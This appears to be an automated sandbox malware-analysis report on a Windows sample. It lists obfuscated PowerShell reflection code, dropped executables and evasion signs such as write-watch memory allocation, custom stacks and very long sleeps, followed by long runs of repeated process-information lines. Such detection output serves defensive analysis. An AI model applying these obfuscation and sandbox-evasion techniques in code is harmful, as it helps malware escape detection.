Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Jeanett)), $Sofabordene122).DefineDynamicModule($Perfect, $false).DefineType($Undermenuers150, $Flamineous, [System.MulticastDelegate]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08B80C27 push 8B05B59Fh; iretd 1_2_08B80C30
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_3_0019CA98 pushfd ; retf 0019h 11_3_0019CA99
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_3_0019EE8C push eax; iretd 11_3_0019EEA9
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_3_0019CF4C push eax; iretd 11_3_0019CF4D
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_3_0019EE60 push eax; iretd 11_3_0019EE65
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00159C30 push esp; retf 0017h 11_2_00159D55
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00154908 push eax; ret 11_2_00154922
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00154938 push eax; ret 11_2_00154932
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015496A push eax; ret 11_2_00154982
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00154998 push eax; ret 11_2_001549A2
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00154988 push eax; ret 11_2_00154992
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C41EE push ecx; iretd 11_2_016C41F9
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C11DA pushfd ; iretd 11_2_016C11DD
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C241C push edx; iretd 11_2_016C242F
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C50BD push EB39B21Fh; iretd 11_2_016C50C2
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C3317 push esp; retf 11_2_016C3375
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C3386 push esp; retf 11_2_016C3375
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C5616 push es; iretd 11_2_016C5614
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C5ACD push edi; iretd 11_2_016C5ACE
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C56CA push DFDEEA70h; iretd 11_2_016C56D1
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C4EB9 push ecx; iretd 11_2_016C4EBA
Drops PE files
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe File created: C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Nonalined.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe API/Special instruction interceptor: Address: 33B8475
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Memory allocated: 110000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Memory allocated: 20250000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Memory allocated: 20050000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599781 Jump to behavior
